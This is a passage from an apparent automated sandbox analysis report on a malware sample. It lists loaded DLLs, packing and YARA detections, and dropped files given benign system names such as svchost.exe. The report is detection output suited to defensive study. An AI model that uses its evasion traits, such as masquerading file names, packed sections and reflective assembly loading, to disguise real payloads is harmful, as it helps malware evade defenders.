              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: KvS2rT08PQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: KvS2rT08PQ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: KvS2rT08PQ.exeStatic file information: File size 2447360 > 1048576
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
              Source: KvS2rT08PQ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24d600
              Source: KvS2rT08PQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: !costura.discordrpc.pdb.compressed source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed|||DiscordRPC.pdb|447C1853EECA30637A94415F07CA7CD3E384746B|27868 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed source: ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed source: ANDYzz-protected.exe.0.dr
              Source: Binary string: 8costura.hardcodet.wpf.taskbarnotification.pdb.compressed source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed|||Hardcodet.Wpf.TaskbarNotification.pdb|0FF074905FAAB506531D68962300EAF21DAF3B05|97792 source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed8 source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed source: ANDYzz-protected.exe.0.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: svchost.exe.0.dr, Fransesco.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 3.0.ANDYzz-protected.exe.191c1be0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1646530842.00000191C1C92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: KvS2rT08PQ.exe PID: 6500, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ANDYzz-protected.exe PID: 2736, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, type: DROPPED
              Source: Umbral.exe.0.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
              Source: ANDYzz-protected.exe.0.drStatic PE information: section name: fgen
              Source: ANDYzz-protected.exe.0.drStatic PE information: section name: fgen
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeCode function: 0_2_00007FFD9B8800BD pushad ; iretd 0_2_00007FFD9B8800C1
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 1_2_00007FFD9B8B00BD pushad ; iretd 1_2_00007FFD9B8B00C1
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_033B313C push ebp; ret 2_2_033B3176
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeCode function: 3_2_00007FFD9B79D2A5 pushad ; iretd 3_2_00007FFD9B79D2A6
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeCode function: 3_2_00007FFD9B8B7963 push ebx; retf 3_2_00007FFD9B8B796A
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeCode function: 3_2_00007FFD9B8B7535 push ebx; iretd 3_2_00007FFD9B8B756A
              Source: ANDYzz-protected.exe.0.drStatic PE information: section name: fgen entropy: 7.999509357708395
              Source: ANDYzz-protected.exe.0.drStatic PE information: section name: .text entropy: 7.969460959015525

              Persistence and Installation Behavior

              barindex
              Drops PE files with benign system names
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Temp\Umbral.exeJump to dropped file
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
